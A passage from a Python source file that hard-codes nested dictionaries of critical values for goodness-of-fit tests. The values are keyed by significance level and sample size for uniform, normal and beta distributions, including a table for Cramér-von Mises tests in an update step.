0.0479593523582066, 'beta2': 0.093134206549116, 'beta4': 0.034852424538950655}, 400: {'uni': 0.056828739022670716, 'nor': 0.13151540254532723, 'beta1': 0.04877580382157087, 'beta2': 0.09653221115404376, 'beta4': 0.03906534512633897}, 300: {'uni': 0.06308823466796709, 'nor': 0.13632125697142994, 'beta1': 0.0557557473436297, 'beta2': 0.10253109087801837, 'beta4': 0.04531815758557228}, 200: {'uni': 0.07360180211640582, 'nor': 0.1432942311893014, 'beta1': 0.0681727970568623, 'beta2': 0.11121417118399335, 'beta4': 0.05595760960414742}, 150: {'uni': 0.08288729795659577, 'nor': 0.15043917273012375, 'beta1': 0.0783065570550272, 'beta2': 0.11935424277145812, 'beta4': 0.06470942284344405}, 100: {'uni': 0.09859178235766261, 'nor': 0.16124156030703884, 'beta1': 0.0958462390352337, 'beta2': 0.13264339398473482, 'beta4': 0.08038263656370306}, 75: {'uni': 0.11264602897630796, 'nor': 0.17162756566496928, 'beta1': 0.1093583226332463, 'beta2': 0.1449055731559286, 'beta4': 0.0936741537870105}, 50: {'uni': 0.1351538849647479, 'nor': 0.1891059788104762, 'beta1': 0.13353828395816583, 'beta2': 0.16446554293023208, 'beta4': 0.11692137693757179}, 30: {'uni': 0.17267793406617293, 'nor': 0.2194410481865578, 'beta1': 0.1715183906280785, 'beta2': 0.19549280548078546, 'beta4': 0.15280157061971122}, 20: {'uni': 0.2080554278862089, 'nor': 0.2504069566387129, 'beta1': 0.20849205040193286, 'beta2': 0.22837347924333673, 'beta4': 0.1902516928790116}, 10: {'uni': 0.2889268854801783, 'nor': 0.32163657747008745, 'beta1': 0.29149738853371904, 'beta2': 0.30355224871981534, 'beta4': 0.27571078427238804}}, 10: {1000: {'uni': 0.07592862842758177, 'nor': 0.17675731917954068, 'beta1': 0.0877969299631155, 'beta2': 0.11144784434222144, 'beta4': 0.02460170484284585}, 750: {'uni': 0.07759279278991063, 'nor': 0.1772870041660417, 'beta1': 0.0879620025181791, 'beta2': 0.11460621564738957, 'beta4': 0.02832708685480334}, 500: {'uni': 0.08065845775127545, 'nor': 0.17989701264902008, 'beta1': 0.08783750916584376, 'beta2': 0.11712110163722245, 'beta4': 0.03467098270876123}, 400: {'uni': 0.08256541536026196, 'nor': 0.18417802004566128, 'beta1': 0.08790601108528329, 'beta2': 0.12019289656717527, 'beta4': 0.03891946560744147}, 300: {'uni': 0.08559905562808945, 'nor': 0.18462701647872692, 'beta1': 0.08826474685236314, 'beta2': 0.12439317845494924, 'beta4': 0.044963765983094595}, 200: {'uni': 0.09169859151319848, 'nor': 0.19139039112626904, 'beta1': 0.08930844976492569, 'beta2': 0.13136678111208, 'beta4': 0.054792012779084076}, 150: {'uni': 0.09812163743144275, 'nor': 0.19750433547881496, 'beta1': 0.09057788640231174, 'beta2': 0.13861898534255174, 'beta4': 0.06359560963591554}, 100: {'uni': 0.11008343360793232, 'nor': 0.20777204018968287, 'beta1': 0.09689906172316676, 'beta2': 0.15021550515080317, 'beta4': 0.07807825052420148}, 75: {'uni': 0.12242653071663401, 'nor': 0.215751343862846, 'beta1': 0.11085258086667488, 'beta2': 0.16074658563892358, 'beta4': 0.0909916380632606}, 50: {'uni': 0.1425128725621415, 'nor': 0.23236256807944267, 'beta1': 0.13421822598853264, 'beta2': 0.17967686927808513, 'beta4': 0.11246630487802428}, 30: {'uni': 0.1756938390152408, 'nor': 0.25727221518650933, 'beta1': 0.17068207541412989, 'beta2': 0.2079075053657387, 'beta4': 0.1469866126893361}, 20: {'uni': 0.21140412281823978, 'nor': 0.28677376608134897, 'beta1': 0.20711509883306756, 'beta2': 0.2384287148752032, 'beta4': 0.18262460986524906}, 10: {'uni': 0.28890701868848456, 'nor': 0.3541341956391229, 'beta1': 0.28845583251972085, 'beta2': 0.3104258261391907, 'beta4': 0.2639310068340357}}}} # skipcq: FLK-E231, FLK-E501 # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update step and the single distributions in the s_cm-tests in the update steps self.crit_val_upd_cm = {0.05: {1000: {1000: {'uni': 0.45559810479972657, 'nor': 0.8517883181720683, 'beta1': 0.46148158376018295, 'beta2': 2.5871697557890188, 'beta4': 0.31747502464750654}, 750: {'uni': 0.46139038881877054, 'nor': 0.7435903262011547, 'beta1': 0.45311472469817826, 'beta2': 1.9077935301454356, 'beta4': 0.32427601703371456}, 500: {'uni': 0.46902770162756147, 'nor': 0.6520675952105567, 'beta1': 0.4585639552609696, 'beta2': 1.3749405307284122, 'beta4': 0.3505515605224531}, 400: {'uni': 0.46369685433009517, 'nor': 0.6086007217455988, 'beta1': 0.46599917293822524, 'beta2': 1.179045003751046, 'beta4': 0.3729228914045017}, 300: {'uni': 0.4644552857669589, 'nor': 0.5653154717862657, 'beta1': 0.46300936268982834, 'beta2': 0.9776044208448484, 'beta4': 0.38982619311615263}, 200: {'uni': 0.4571278925321188, 'nor': 0.5334620435688897, 'beta1': 0.45769696165515195, 'beta2': 0.783196788788819, 'beta4': 0.4111185009994434}, 150: {'uni': 0.4501014461173613, 'nor': 0.5235082860405369, 'beta1': 0.4554205617411987, 'beta2': 0.7050034087974801, 'beta4': 0.4169551450168423}, 100: {'uni': 0.4640563713024824, 'nor': 0.5088639605300145, 'beta1': 0.4526189404673693, 'beta2': 0.6166857601686297, 'beta4': 0.4284294881310813}, 75: {'uni': 0.46172983920615474, 'nor': 0.48326130937595263, 'beta1': 0.46557677737339276, 'beta2': 0.5663728109579013, 'beta4': 0.43479865707945214}, 50: {'uni': 0.45384779467384323, 'nor': 0.4744302526175002, 'beta1': 0.4578899375202278, 'beta2': 0.5360352336411138, 'beta4': 0.4483607871304931}, 30: {'uni': 0.4582035780536769, 'nor': 0.4625643124126838, 'beta1': 0.46174031673574345, 'beta2': 0.4992136649412738, 'beta4': 0.45735799800719645}, 20: {'uni': 0.4526152214826935, 'nor': 0.4700366710058157, 'beta1': 0.45825521668523833, 'beta2': 0.48288733318211274, 'beta4': 0.4513037697878831}, 10: {'uni': 0.4557565864779044, 'nor': 0.4605305109093896, 'beta1': 0.45008522280936103, 'beta2': 0.456650225645871, 'beta4': 0.4473779014384035}}, 750: {1000: {'uni': 0.4671101385676527, 'nor': 0.9530664085923595, 'beta1': 0.47021996721580633, 'beta2': 2.576076443647349, 'beta4': 0.28735513040023863}, 750: {'uni': 0.46549469608311234, 'nor': 0.8304507565146779, 'beta1': 0.46247720908266216, 'beta2': 1.9297411734235133, 'beta4': 0.3175400030818115}, 500: {'uni': 0.45031971859128733, 'nor': 0.7037121636426986, 'beta1': 0.4561887749034241, 'beta2': 1.3861924601141589, 'beta4': 0.33932522495776996}, 400: {'uni': 0.45910749033925163, 'nor': 0.6584547024212655, 'beta1': 0.46280894836812647, 'beta2': 1.177901179686585, 'beta4': 0.36205890600857127}, 300: {'uni': 0.4598996192822354, 'nor': 0.5932997635796144, 'beta1': 0.4566144871979255, 'beta2': 1.003307298985205, 'beta4': 0.37620893309626435}, 200: {'uni': 0.4687450522736763, 'nor': 0.5535329672062865, 'beta1': 0.45546423259991065, 'beta2': 0.8003681825795168, 'beta4': 0.39545533013427847}, 150: {'uni': 0.4615068053273442, 'nor': 0.5337201883098839, 'beta1': 0.4658827349939095, 'beta2': 0.7194878279530482, 'beta4': 0.39930675083159844}, 100: {'uni': 0.45294161352762236, 'nor': 0.49934234578623937, 'beta1': 0.45939987939480864, 'beta2': 0.6271644471759874, 'beta4': 0.42228996859829304}, 75: {'uni': 0.46396194890875886, 'nor': 0.4991938436100394, 'beta1': 0.4516637122972515, 'beta2': 0.600183976681279, 'beta4': 0.4315787240897153}, 50: {'uni': 0.4558134596093263, 'nor': 0.48532012355575227, 'beta1': 0.46668813480110743, 'beta2': 0.5516090319210735, 'beta4': 0.4403510493137504}, 30: {'uni': 0.4532337683620265, 'nor': 0.47431141524632014, 'beta1': 0.45894951442019266, 'beta2': 0.5127086350573624, 'beta4': 0.4538090248861624}, 20: {'uni': 0.45706656231424797, 'nor': 0.4683828099157367, 'beta1': 0.4578578291661163, 'beta2': 0.48619566535923797, 'beta4': 0.45265523176626016}, 10: {'uni': 0.4547063269767834, 'nor': 0.4642234490355344, 'beta1': 0.458910199349091, 'beta2': 0.47790940842399, 'beta4': 0.44187531689045434}}, 500: {1000: {'uni': 0.46431028072910796, 'nor': 1.2234668429214117, 'beta1': 0.4663409164283998, 'beta2': 2.909984174283791, 'beta4': 0.2638984835623977}, 750: {'uni': 0.4527296267722845, 'nor': 1.0129802673096442, 'beta1': 0.4661915241033681, 'beta2': 2.234543975122914, 'beta4': 0.28640752516522716}, 500: {'uni': 0.44920975339976527, 'nor': 0.8384973662337322, 'beta1': 0.4659177279610012, 'beta2': 1.6573851889124338, 'beta4': 0.3100483149128471}, 400: {'uni': 0.4604675769306956, 'nor': 0.7579069321331191, 'beta1': 0.4597499831992274, 'beta2': 1.375925316264524, 'beta4': 0.3271543663337684}, 300: {'uni': 0.46331646241562313, 'nor': 0.6860309707578209, 'beta1': 0.45672744909248153, 'beta2': 1.1455923805506387, 'beta4': 0.35199679848261545}, 200: {'uni': 0.46098791431035313, 'nor': 0.6110936233160561, 'beta1': 0.45623909036855964, 'beta2': 0.9023873311329137, 'beta4': 0.3740712067833442}, 150: {'uni': 0.46468019323747944, 'nor': 0.5726647439154294, 'beta1': 0.4579527283181098, 'beta2': 0.8137349608860205, 'beta4': 0.38660489715338325}, 100: {'uni': 0.44280947247057195, 'nor': 0.541212184044558, 'beta1': 0.4586912165344261, 'beta2': 0.6802911262157844, 'beta4': 0.40623099849768124}, 75: {'uni': 0.46067109767294057, 'nor': 0.5060241328725488, 'beta1': 0.4491456775696246, 'beta2': 0.6232000035126825, 'beta4': 0.41007335800405376}, 50: {'uni': 0.4642733769081602, 'nor': 0.4977233114944672, 'beta1': 0.4626897423482415, 'beta2': 0.5705187474225152, 'beta4': 0.43059164051626647}, 30: {'uni': 0.4634043308646643, 'nor': 0.47331431231053034, 'beta1': 0.4554845714502249, 'beta2': 0.5139451555702169, 'beta4': 0.4409000510846484}, 20: {'uni': 0.45447992295448086, 'nor': 0.46678900243826393, 'beta1': 0.4626946837181949, 'beta2': 0.4930376191474854, 'beta4': 0.44935770151688587}, 10: {'uni': 0.45968160397151125, 'nor': 0.45690145976659674, 'beta1': 0.4566821472035449, 'beta2': 0.47419588710664023, 'beta4': 0.4454396591179534}}, 400: {1000: {'uni': 0.46334746314235276, 'nor': 1.4212390782587057, 'beta1': 0.46432389571147187, 'beta2': 2.9511199986889567, 'beta4': 0.2548616038247043}, 750: {'uni': 0.46250149072434, 'nor': 1.1572837205061097, 'beta1': 0.45295311454161974, 'beta2': 2.2440218041300914, 'beta4': 0.2710536211963412}, 500: {'uni': 0.45875549934793214, 'nor': 0.9122844809960323, 'beta1': 0.46801707119646535, 'beta2': 1.6311861640718006, 'beta4': 0.299393562783303}, 400: {'uni': 0.45999191565658354, 'nor': 0.8321847654729663, 'beta1': 0.4543498505221871, 'beta2': 1.3834076695036321, 'beta4': 0.3147187867784898}, 300: {'uni': 0.4554315877101111, 'nor': 0.7443688240945351, 'beta1': 0.45801052563798017, 'beta2': 1.1684865218336506, 'beta4': 0.33644119882532764}, 200: {'uni': 0.45178274951742387, 'nor': 0.6453749303312785, 'beta1': 0.4622690847109136, 'beta2': 0.9539305765063816, 'beta4': 0.36638705949582}, 150: {'uni': 0.46095703347012823, 'nor': 0.5920587225254844, 'beta1': 0.46154296100068704, 'beta2': 0.8211590220880783, 'beta4': 0.3773287000190313}, 100: {'uni': 0.4544996973676238, 'nor': 0.5571569000218716, 'beta1': 0.453375970925131, 'beta2': 0.692973824446134, 'beta4': 0.39552439235261067}, 75: {'uni': 0.4557987009033754, 'nor': 0.5310033434466808, 'beta1': 0.46394857322795036, 'beta2': 0.6395425030032836, 'beta4': 0.41383415561423936}, 50: {'uni': 0.4596200061931766, 'nor': 0.5035061103314598, 'beta1': 0.46157446299514704, 'beta2': 0.5707639621760862, 'beta4': 0.4274547334895614}, 30: {'uni': 0.4622195415634097, 'nor': 0.481847432681625, 'beta1': 0.45645686175488404, 'beta2': 0.5282215919286881, 'beta4': 0.44942696536191723}, 20: {'uni': 0.4601535149631279, 'nor': 0.46786286516371267, 'beta1': 0.4584807741864064, 'beta2': 0.5048557967951252, 'beta4': 0.4467008433551776}, 10: {'uni': 0.4566656610912351, 'nor': 0.4608766556204386, 'beta1': 0.45972096388599104, 'beta2': 0.46187183414597643, 'beta4': 0.44529944495174606}}, 300: {1000: {'uni': 0.4678306072779978, 'nor': 1.6846576613370994, 'beta1': 0.455141320355163, 'beta2': 3.2769979281996946, 'beta4': 0.24362518318852816}, 750: {'uni': 0.4639283758788118, 'nor': 1.3692288724675523, 'beta1': 0.4519930460350413, 'beta2': 2.48255224192705, 'beta4': 0.257787980956284}, 500: {'uni': 0.4615433540741257, 'nor': 1.0781678636207295, 'beta1': 0.4568829378747058, 'beta2': 1.7874941485381564, 'beta4': 0.2784868409512676}, 400: {'uni': 0.46314421492499913, 'nor': 0.945656701408267, 'beta1': 0.45638148747157714, 'beta2': 1.5553160126544203, 'beta4': 0.29442225358951485}, 300: {'uni': 0.45802925961617075, 'nor': 0.815185178839487, 'beta1': 0.4728376878704712, 'beta2': 1.3189271036216643, 'beta4': 0.31282000690847095}, 200: {'uni': 0.45552503014694784, 'nor': 0.7126513035155815, 'beta1': 0.457748166276982, 'beta2': 1.0244415040388415, 'beta4': 0.33638426993603954}, 150: {'uni': 0.45977438272674637, 'nor': 0.6476380215438066, 'beta1': 0.46088490835938306, 'beta2': 0.883431113717793, 'beta4': 0.3612048298573282}, 100: {'uni': 0.4577251815882555, 'nor': 0.5847497979075034, 'beta1': 0.4607222654294412, 'beta2': 0.7408620962926734, 'beta4': 0.388104481277193}, 75: {'uni': 0.4518072467213142, 'nor': 0.5473729546010359, 'beta1': 0.4627254896168214, 'beta2': 0.6718156449469996, 'beta4': 0.39949639520710356}, 50: {'uni': 0.4624340988295268, 'nor': 0.5070678067559616, 'beta1': 0.4600742937716636, 'beta2': 0.5877011320882554, 'beta4': 0.41897175228123534}, 30: {'uni': 0.4471319926020618, 'nor': 0.49800426129809117, 'beta1': 0.46166731503603964, 'beta2': 0.5382082617448081, 'beta4': 0.4269532461240621}, 20: {'uni': 0.4507897993107089, 'nor': 0.4883236654625753, 'beta1': 0.45173581672090074, 'beta2': 0.5137279220044103, 'beta4': 0.429523416507684}, 10: {'uni': 0.45073558507341144, 'nor': 0.46918804329372793, 'beta1': 0.4451935416099544, 'beta2': 0.4852511163613957, 'beta4': 0.44714304152144957}}, 200: {1000: {'uni': 0.45885173358196935, 'nor': 2.313702128659912, 'beta1': 0.46628907909788697, 'beta2': 3.919691106665795, 'beta4': 0.22577462466197668}, 750: {'uni': 0.46486920384123687, 'nor': 1.894257654666399, 'beta1': 0.4583262434977319, 'beta2': 2.996917703241686, 'beta4': 0.2365414295750558}, 500: {'uni': 0.4655614734441917, 'nor': 1.4121255947025406, 'beta1': 0.46139377072341475, 'beta2': 2.1388747442025053, 'beta4': 0.25571742276292764}, 400: {'uni': 0.45979504899083645, 'nor': 1.1959447863019266, 'beta1': 0.4633743884393436, 'beta2': 1.8945633202659455, 'beta4': 0.26174739678990866}, 300: {'uni': 0.46151970036157763, 'nor': 0.9990455243111591, 'beta1': 0.45625628150868885, 'beta2': 1.5323939095799728, 'beta4': 0.2797029660784162}, 200: {'uni': 0.46329361026808363, 'nor': 0.8279186395972875, 'beta1': 0.4601804288648336, 'beta2': 1.1681140647178716, 'beta4': 0.30982583667555}, 150: {'uni': 0.4572822684346562, 'nor': 0.7479149303285376, 'beta1': 0.4594933621823919, 'beta2': 0.9966989126230038, 'beta4': 0.33461124037426687}, 100: {'uni': 0.45394668972915964, 'nor': 0.6398062870023858, 'beta1': 0.4627344243428069, 'beta2': 0.8176636065711426, 'beta4': 0.3599502235499713}, 75: {'uni': 0.46314929132601923, 'nor': 0.5942511767606652, 'beta1': 0.462554701559842, 'beta2': 0.726258500681477, 'beta4': 0.37828723280018234}, 50: {'uni': 0.4556089575922582, 'nor': 0.5488603313292467, 'beta1': 0.4598695592482842, 'beta2': 0.6441882415918142, 'beta4': 0.3957454832976954}, 30: {'uni': 0.45773418553147505, 'nor': 0.5205925655922161, 'beta1': 0.45894106285346375, 'beta2': 0.569590768144685, 'beta4': 0.4160624036343173}, 20: {'uni': 0.46253502192456564, 'nor': 0.4949851926492912, 'beta1': 0.462302879698588, 'beta2': 0.5144720515689009, 'beta4': 0.4386929562520044}, 10: {'uni': 0.4585444998193927, 'nor': 0.46913451515184496, 'beta1': 0.4450396687432986, 'beta2': 0.4801828396960754, 'beta4': 0.4417697576556915}}, 150: {1000: {'uni': 0.4686739363709819, 'nor': 3.0262824022146155, 'beta1': 0.46075378959802543, 'beta2': 4.496772517732899, 'beta4': 0.21956864156299188}, 750: {'uni': 0.4730757712115682, 'nor': 2.2878474628402823, 'beta1': 0.4641952013648905, 'beta2': 3.454226350268236, 'beta4': 0.22513983749519534}, 500: {'uni': 0.467323739972249, 'nor': 1.6752768321041132, 'beta1': 0.4734160827536498, 'beta2': 2.5583449698042604, 'beta4': 0.24163315664882407}, 400: {'uni': 0.467181361388595, 'nor': 1.4717110841963421, 'beta1': 0.45676945943433245, 'beta2': 2.2003419598014085, 'beta4': 0.25499403072675786}, 300: {'uni': 0.45817365599621135, 'nor': 1.2144884739248925, 'beta1': 0.45423292829145157, 'beta2': 1.6795832143167255, 'beta4': 0.26984851882435923}, 200: {'uni': 0.46031214602007703, 'nor': 0.9544823344865221, 'beta1': 0.45827471295224265, 'beta2': 1.3068555477711477, 'beta4': 0.2956335766326793}, 150: {'uni': 0.46250179659059476, 'nor': 0.8307292323075929, 'beta1': 0.47030699679154425, 'beta2': 1.0824444708192549, 'beta4': 0.3116662669384352}, 100: {'uni': 0.47437294155670234, 'nor': 0.698032260670409, 'beta1': 0.46050428122512643, 'beta2': 0.8771177581058969, 'beta4': 0.3478432220883441}, 75: {'uni': 0.46101568928238096, 'nor': 0.6391901872213495, 'beta1': 0.45808838518118866, 'beta2': 0.7703520551683095, 'beta4': 0.35717525548395185}, 50: {'uni': 0.46462622526658554, 'nor': 0.5996395671389139, 'beta1': 0.454405885743777, 'beta2': 0.6701476805830073, 'beta4': 0.383110957598389}, 30: {'uni': 0.4549742139788515, 'nor': 0.5227227637941175, 'beta1': 0.4526654552204387, 'beta2': 0.5842761326082846, 'beta4': 0.4060905864194273}, 20: {'uni': 0.45533149660388467, 'nor': 0.5056742867344781, 'beta1': 0.46385670689315067, 'beta2': 0.5371663970405931, 'beta4': 0.4217230902196201}, 10: {'uni': 0.4535641773609069, 'nor': 0.48426462527854375, 'beta1': 0.4605937364242689, 'beta2': 0.4901859387468606, 'beta4': 0.43806641766772514}}, 100: {1000: {'uni': 0.48930491522355274, 'nor': 4.231794279078222, 'beta1': 0.4648268159128582, 'beta2': 5.076033920994245, 'beta4': 0.2123190473857698}, 750: {'uni': 0.47066230425528277, 'nor': 3.3241758532972563, 'beta1': 0.4613337407126484, 'beta2': 4.110911007916439, 'beta4': 0.21746590521356995}, 500: {'uni': 0.4704192169450034, 'nor': 2.3153245303624077, 'beta1': 0.4565432447792894, 'beta2': 2.8234958993051213, 'beta4': 0.22605852382886565}, 400: {'uni': 0.465838791251487, 'nor': 1.9527095270766885, 'beta1': 0.4566450098243281, 'beta2': 2.4468007928214504, 'beta4': 0.23721322735781392}, 300: {'uni': 0.46411098088520025, 'nor': 1.561014800073201, 'beta1': 0.4632108284525748, 'beta2': 1.8642831244346392, 'beta4': 0.24835753772698207}, 200: {'uni': 0.45174147277551824, 'nor': 1.2023498240705341, 'beta1': 0.46011541007923223, 'beta2': 1.4533092999265533, 'beta4': 0.2695895257232507}, 150: {'uni': 0.45512101910714126, 'nor': 1.0227861444988746, 'beta1': 0.45629355382831654, 'beta2': 1.2101007363962848, 'beta4': 0.2826402129948454}, 100: {'uni': 0.44895422601988727, 'nor': 0.8281829651173791, 'beta1': 0.4599492148727822, 'beta2': 0.9522402297514921, 'beta4': 0.3100819029507226}, 75: {'uni': 0.4624546094616787, 'nor': 0.7391357154698432, 'beta1': 0.4454256867486279, 'beta2': 0.8380807783471576, 'beta4': 0.3350546905751392}, 50: {'uni': 0.4582123043671451, 'nor': 0.6436142214253436, 'beta1': 0.45290471826329226, 'beta2': 0.6884686777502067, 'beta4': 0.3535200461220699}, 30: {'uni': 0.45027154229719185, 'nor': 0.5713935637999112, 'beta1': 0.4573479450749157, 'beta2': 0.6015939522027731, 'beta4': 0.3839413198651744}, 20: {'uni': 0.45171743897365974, 'nor': 0.5347497445539434, 'beta1': 0.46211432961160004, 'beta2': 0.5451510328036631, 'beta4': 0.40451931108916456}, 10: {'uni': 0.44070319928906704, 'nor': 0.4936671748919524, 'beta1': 0.4541059781166824, 'beta2': 0.49464729872647506, 'beta4': 0.4318904485577639}}, 75: {1000: {'uni': 0.5003977481745122, 'nor': 5.462091297206367, 'beta1': 0.4680613054845644, 'beta2': 5.924127662942348, 'beta4': 0.20689611333819638}, 750: {'uni': 0.4863213870019091, 'nor': 4.195407788335534, 'beta1': 0.45921461198551916, 'beta2': 4.565196319176767, 'beta4': 0.2117710761786967}, 500: {'uni': 0.48206260654769756, 'nor': 3.009404705689477, 'beta1': 0.4594797526137332, 'beta2': 3.2296753596700754, 'beta4': 0.219205809113329}, 400: {'uni': 0.48282191154017823, 'nor': 2.463683631414553, 'beta1': 0.45092972241618584, 'beta2': 2.6765713933408413, 'beta4': 0.2251887548381428}, 300: {'uni': 0.47174966823511777, 'nor': 1.9615869965631514, 'beta1': 0.4583462725670028, 'beta2': 2.1532255364843853, 'beta4': 0.23397868721020146}, 200: {'uni': 0.4626689744300011, 'nor': 1.4641327983886003, 'beta1': 0.4658991503050986, 'beta2': 1.5737286518460933, 'beta4': 0.25104192403440617}, 150: {'uni': 0.4657367060782218, 'nor': 1.2246992402511192, 'beta1': 0.4608643825770374, 'beta2': 1.298200837285324, 'beta4': 0.2657567009143168}, 100: {'uni': 0.4680974024125245, 'nor': 0.9869302426794837, 'beta1': 0.45671102797869095, 'beta2': 1.0239621521249562, 'beta4': 0.28860697938441604}, 75: {'uni': 0.45721900242950014, 'nor': 0.8394457650917727, 'beta1': 0.45257963102668763, 'beta2': 0.8762211832314769, 'beta4': 0.30828992116505344}, 50: {'uni': 0.46221923910596263, 'nor': 0.7025130572021119, 'beta1': 0.4663920405352124, 'beta2': 0.7320291693929537, 'beta4': 0.3374203378918949}, 30: {'uni': 0.46162653508754836, 'nor': 0.5945057627400746, 'beta1': 0.460262757481406, 'beta2': 0.6125308748955279, 'beta4': 0.37175415079144314}, 20: {'uni': 0.4484831394973252, 'nor': 0.5549838564035073, 'beta1': 0.4465222643970824, 'beta2': 0.5731591544178343, 'beta4': 0.3955814404310021}, 10: {'uni': 0.4476154281433029, 'nor': 0.5084002647840371, 'beta1': 0.44746085678431474, 'beta2': 0.5057333922587223, 'beta4': 0.41560141836545733}}, 50: {1000: {'uni': 0.5663296978660596, 'nor': 7.983963066009825, 'beta1': 0.46814721453633024, 'beta2': 7.492537638667248, 'beta4': 0.20220788976247608}, 750: {'uni': 0.534971516073435, 'nor': 6.083186838398358, 'beta1': 0.46772071939621757, 'beta2': 5.857165814312657, 'beta4': 0.2087106159241854}, 500: {'uni': 0.5110652229849488, 'nor': 4.245763354477031, 'beta1': 0.4635245488014993, 'beta2': 4.006367236866797, 'beta4': 0.2125436775661207}, 400: {'uni': 0.49656540793595844, 'nor': 3.4903307593763615, 'beta1': 0.4596191698570935, 'beta2': 3.220472312730357, 'beta4': 0.21522710874813766}, 300: {'uni': 0.48325484856882694, 'nor': 2.7439875309400663, 'beta1': 0.46979584833424004, 'beta2': 2.454009618094874, 'beta4': 0.22202183552173416}, 200: {'uni': 0.4749008479770199, 'nor': 1.9911920792861806, 'beta1': 0.4646514964240773, 'beta2': 1.8398693746548478, 'beta4': 0.23132822063479933}, 150: {'uni': 0.45992992076859157, 'nor': 1.5868134499191664, 'beta1': 0.4643633359446529, 'beta2': 1.5244070878488096, 'beta4': 0.241921281044518}, 100: {'uni': 0.4595325614734308, 'nor': 1.1877615726990094, 'beta1': 0.4556650201969106, 'beta2': 1.1488237785978777, 'beta4': 0.26302607932992944}, 75: {'uni': 0.4520277530528519, 'nor': 1.0399301654084963, 'beta1': 0.45349015551351834, 'beta2': 0.9621553030458346, 'beta4': 0.2888083942150036}, 50: {'uni': 0.44992890748902026, 'nor': 0.8404661942325818, 'beta1': 0.45869080459514733, 'beta2': 0.8067902763450495, 'beta4': 0.30944414708340734}, 30: {'uni': 0.45607719675530556, 'nor': 0.6802063225745539, 'beta1': 0.44960843024574637, 'beta2': 0.6511496131049556, 'beta4': 0.34852267592227426}, 20: {'uni': 0.4475451587223669, 'nor': 0.5993508489607557, 'beta1': 0.4465931941437228, 'beta2': 0.596548736443132, 'beta4': 0.37438540421392114}, 10: {'uni': 0.44988236069403104, 'nor': 0.5247871497390096, 'beta1': 0.45464843165719043, 'beta2': 0.50412851889225, 'beta4': 0.4041010172891987}}, 30: {1000: {'uni': 0.7387233486988768, 'nor': 13.088402113564948, 'beta1': 0.47865647929539973, 'beta2': 9.912717867631558, 'beta4': 0.19858219196297577}, 750: {'uni': 0.6716005073702885, 'nor': 9.898721221592352, 'beta1': 0.46649443507443217, 'beta2': 7.416096292643614, 'beta4': 0.20003363414287242}, 500: {'uni': 0.5992179294036338, 'nor': 6.920710947011493, 'beta1': 0.46975583075586863, 'beta2': 4.964800683896901, 'beta4': 0.20435420309200666}, 400: {'uni': 0.5561270269868971, 'nor': 5.66798011970821, 'beta1': 0.4717982184500732, 'beta2': 4.106537093753369, 'beta4': 0.20691331385704004}, 300: {'uni': 0.5368877356646864, 'nor': 4.2779346835887555, 'beta1': 0.4652230282555292, 'beta2': 3.1241120043999575, 'beta4': 0.21011463481669218}, 200: {'uni': 0.4987013286374435, 'nor': 2.959741272830969, 'beta1': 0.46381906690045765, 'beta2': 2.2157230067479814, 'beta4': 0.21729932835609236}, 150: {'uni': 0.49840708861118943, 'nor': 2.352823733206511, 'beta1': 0.45640297863082435, 'beta2': 1.779992721937523, 'beta4': 0.22700584318850683}, 100: {'uni': 0.471756061765789, 'nor': 1.7431236435657966, 'beta1': 0.45530265822942073, 'beta2': 1.337831703717496, 'beta4': 0.23974268049710493}, 75: {'uni': 0.4649466295886003, 'nor': 1.4126507700625057, 'beta1': 0.4580500700771751, 'beta2': 1.128839322838012, 'beta4': 0.251645105883213}, 50: {'uni': 0.4535321638232544, 'nor': 1.0828805050102166, 'beta1': 0.4538612144716673, 'beta2': 0.8944487312764252, 'beta4': 0.2772114320140775}, 30: {'uni': 0.4548389075174882, 'nor': 0.8377037159832129, 'beta1': 0.4519596464989444, 'beta2': 0.7094375595815571, 'beta4': 0.310244459466603}, 20: {'uni': 0.4451068851924446, 'nor': 0.7339007690903065, 'beta1': 0.4451277942845969, 'beta2': 0.6008918124507844, 'beta4': 0.338998587660669}, 10: {'uni': 0.45353927033858477, 'nor': 0.5782028388164439, 'beta1': 0.4584685620829519, 'beta2': 0.531376107648766, 'beta4': 0.38352415993817385}}, 20: {1000: {'uni': 1.0894922478649511, 'nor': 20.003094666486263, 'beta1': 0.5181844718184673, 'beta2': 12.13321215700854, 'beta4': 0.1962693415263007}, 750: {'uni': 0.9184009700423779, 'nor': 15.013754159330176, 'beta1': 0.5021945895537219, 'beta2': 9.162381456103228, 'beta4': 0.19629774346862977}, 500: {'uni': 0.7588954962445985, 'nor': 10.055656119144814, 'beta1': 0.4922340597004922, 'beta2': 6.123698563556234, 'beta4': 0.20025199202983998}, 400: {'uni': 0.6997818044235432, 'nor': 8.209642023001999, 'beta1': 0.4816402192212816, 'beta2': 5.1244484441005325, 'beta4': 0.20180721973367308}, 300: {'uni': 0.6305296664843701, 'nor': 6.273332564653617, 'beta1': 0.4783208741435825, 'beta2': 3.8922181031413277, 'beta4': 0.20515722848399004}, 200: {'uni': 0.5656028930795196, 'nor': 4.372928002486701, 'beta1': 0.475973934426061, 'beta2': 2.677360291305044, 'beta4': 0.2100432666640936}, 150: {'uni': 0.5349220822574644, 'nor': 3.3411354111522917, 'beta1': 0.47500519582521517, 'beta2': 2.137164523272219, 'beta4': 0.214232307355653}, 100: {'uni': 0.5045468518311341, 'nor': 2.4340920510874984, 'beta1': 0.45888547757876796, 'beta2': 1.588903919680189, 'beta4': 0.2246944373092718}, 75: {'uni': 0.48771323589584, 'nor': 1.9342381299397664, 'beta1': 0.459726728581532, 'beta2': 1.286504131157538, 'beta4': 0.23430910656002463}, 50: {'uni': 0.4644642299419138, 'nor': 1.4514552833852477, 'beta1': 0.45454814751513606, 'beta2': 0.9699335230442881, 'beta4': 0.24784781696012298}, 30: {'uni': 0.4630355897784532, 'nor': 1.0525485187071442, 'beta1': 0.44890325734490744, 'beta2': 0.7612572461007282, 'beta4': 0.27771911847861674}, 20: {'uni': 0.44436687230622546, 'nor': 0.8395516873431574, 'beta1': 0.45817604259495165, 'beta2': 0.6608362126367603, 'beta4': 0.31123542244036}, 10: {'uni': 0.4361704051076968, 'nor': 0.6572725764375509, 'beta1': 0.4413867755624091, 'beta2': 0.549693246598183, 'beta4': 0.35789683180043264}}, 10: {1000: {'uni': 2.71866569395543, 'nor': 40.3607988416683, 'beta1': 1.045723953486904, 'beta2': 18.264584863269278, 'beta4': 0.19340346551484838}, 750: {'uni': 2.135095878109219, 'nor': 31.335751870550318, 'beta1': 0.8686608835871902, 'beta2': 13.837281382290511, 'beta4': 0.19674409440753848}, 500: {'uni': 1.561435372670413, 'nor': 20.847843925502136, 'beta1': 